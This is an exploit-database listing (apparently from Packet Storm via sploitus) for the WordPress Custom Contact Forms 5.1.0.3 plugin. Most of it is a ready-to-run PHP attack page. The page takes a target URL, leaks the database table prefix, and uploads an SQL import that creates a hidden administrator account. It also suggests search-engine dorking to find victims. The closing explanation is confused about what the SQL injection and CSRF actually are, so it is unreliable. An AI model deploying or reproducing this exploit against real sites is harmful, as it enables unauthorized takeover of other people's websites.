Exploit for WordPress Custom Contact Form 5.1.0.3 CSRF / SQL Injection

Name: Exploit for WordPress Custom Contact Form 5.1.0.3 CSRF / SQL Injection
Rating: 5 (122 reviews)
2025-03-07 | CVSS 8.4
## https://sploitus.com/exploit?id=PACKETSTORM:189634
=============================================================================================================================================
    | # Title     : WordPress Custom contact forms Plugin v 5.1.0.3 CSRF / SQL Injection
         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/                                                                                                      |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code attempts to exploit a vulnerability in WordPress to add a new admin user.
       
       (linked: https://packetstorm.news/files/id/180885/ Linked CVE numbers: ),
    	
    [+] save code as poc.php.
    
    [+] Line 70 set you user & pass
    
    [+] USage : http://127.0.0.1/poc.php 
    
    [+] PayLoad :
    
    <?php
    // واجهة لإدارة استغلال ثغرة custom-contact-forms في ووردبريس
    error_reporting(0);
    session_start();
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $target = $_POST['target'];
        $username = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, 10);
        $password = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 20);
        
        function getTablePrefix($target) {
            $export_url = "$target/wp-admin/admin-post.php";
            
            $postdata = http_build_query([ 'ccf_export' => '1' ]);
            $opts = ['http' => ['method' => 'POST', 'content' => $postdata]];
            $context = stream_context_create($opts);
            $response = file_get_contents($export_url, false, $context);
            
            if (!$response || !preg_match('/insert into `(.+_)customcontactforms_fields`/i', $response, $matches)) {
                return null;
            }
            return $matches[1];
        }
        
        $table_prefix = getTablePrefix($target);
        if (!$table_prefix) {
            echo "<p>تعذر الحصول على بادئة الجدول!</p>";
            exit;
        }
        
        $sql = "INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password'));
                INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) 
                VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
        
        $boundary = md5(time());
        $data = "--$boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.sql\"\r\n";
        $data .= "Content-Type: text/plain\r\n\r\n";
        $data .= "$sql\r\n";
        $data .= "--$boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"ccf_merge_import\"\r\n\r\n1\r\n";
        $data .= "--$boundary--\r\n";
        
        $opts = ['http' => ['method' => 'POST', 'header' => "Content-Type: multipart/form-data; boundary=$boundary", 'content' => $data]];
        $context = stream_context_create($opts);
        $result = file_get_contents("$target/wp-admin/admin-post.php", false, $context);
        
        if ($result) {
            echo "<p>تم إنشاء مستخدم جديد بنجاح!<br>indoushka: <b>$username</b><br>packet2025strom: <b>$password</b></p>";
        } else {
            echo "<p>فشل في تنفيذ الهجوم!</p>";
        }
    }
    ?>
    
    <!DOCTYPE html>
    <html lang="ar">
    <head>
        <meta charset="UTF-8">
        <title>استغلال ثغرة ووردبريس</title>
    </head>
    <body>
        <h2>استغلال ثغرة ووردبريس - custom-contact-forms</h2>
        <form method="POST">
            <label>رابط الموقع المستهدف:</label>
            <input type="text" name="target" required>
            <button type="submit">تنفيذ</button>
        </form>
    </body>
    </html>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
    
    
    Explanation:
    
    1. SQL Injection in the Code:
    
    The key part that exploits SQL Injection is this line:
    
    $sql = "INSERT INTO {$table_prefix}users (user_login, user_pass)
    VALUES ('$username', MD5('$password'));
            INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value)
            VALUES ((SELECT id FROM {$table_prefix}users WHERE
    user_login='$username'), '{$table_prefix}capabilities',
            'a:1:{s:13:\"administrator\";b:1;}');";
    
    SQL Injection is being leveraged here in two key ways:
    
    Dynamic Table Prefix: The $table_prefix variable is dynamically set from
    the vulnerable WordPress site by exploiting the vulnerability in the
    "Custom Contact Forms" plugin. By using this dynamic table prefix, the
    attacker injects the actual table names into the SQL query. This is crucial
    because WordPress installations can use different table prefixes (such as
    wp_, wp123_, etc.), so exploiting this prefix injection allows the attacker
    to target any WordPress installation, regardless of its configuration.
    
    User and Meta Insertions: The attacker inserts values for the user_login
    and user_pass columns in the users table and inserts the capabilities
    metadata for the user into the usermeta table. The attacker injects
    arbitrary values directly into the SQL query, including the user_login,
    user_pass, and meta_value, allowing them to create a user with
    administrator privileges.
    
    Specifically, this line: INSERT INTO {$table_prefix}users (user_login,
    user_pass) VALUES ('$username', MD5('$password'));
    
    The attacker can control the $username and $password values by generating
    them randomly, ensuring that a new admin user is created.
    
    And this line: INSERT INTO {$table_prefix}usermeta (user_id, meta_key,
    meta_value)
    VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'),
    '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');
    
    
    2. CSRF (Cross-Site Request Forgery):
    
    The CSRF comes into play because the attacker is exploiting the WordPress
    site's functionality by sending a POST request to the site without the
    target user's knowledge or consent.
    
    The attacker crafts a malicious request (with the SQL injection and user
    creation data) and then sends it to the WordPress site via the
    admin-post.php endpoint.
    
    This request is sent through an HTML form (the form in the provided code),
    and the attacker only needs the target website's URL. If a logged-in
    WordPress user accesses this malicious page, it triggers the creation of
    the new user with admin privileges.
    
    The attack uses file_get_contents() to send a POST request to the
    wp-admin/admin-post.php endpoint. The attacker is bypassing any CSRF
    protections (like WordPress's nonces) that could otherwise prevent this
    attack.